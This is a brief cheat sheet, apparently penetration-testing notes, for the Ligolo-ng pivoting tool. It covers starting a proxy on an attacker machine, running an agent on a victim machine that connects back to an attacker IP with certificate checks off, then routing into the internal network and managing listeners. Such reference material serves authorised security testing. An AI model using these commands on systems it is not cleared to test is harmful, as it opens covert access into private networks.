Lingolo-ng
Basic Configuration
Create a connection
Proxy machine
Start the Lingolo proxy with a self-signed certificate on attacker machine with root privileges.
sudo proxy --selfcert
Agent machine
Run the agent on the victim machine to connect to the Lingolo proxy.
./agent.exe --connect <attacker_ip>:<proxy_port> --ignore-cert
Network Configuration
After the agent successfully connects, select the session.
session
Start the network interface
Create a network interface on the proxy's machine.
tunnel_start --tun ligolo
Add a new routing
List available interfaces on the agent.
ifconfig
Add a route to the internal interface.
add_route --name ligolo --route <internal_interface>
Port Forward Listeners
Add a Listener.
listener_add --addr <agent_ip>:<port> --to <proxy_ip>:<port>
List Active Listeners.
listener_list
Stop a Listener.
listener_stop <ID>
Delete interface
list interfaces
interface_list
Delete interface
ifdel --name ligolo
Last updated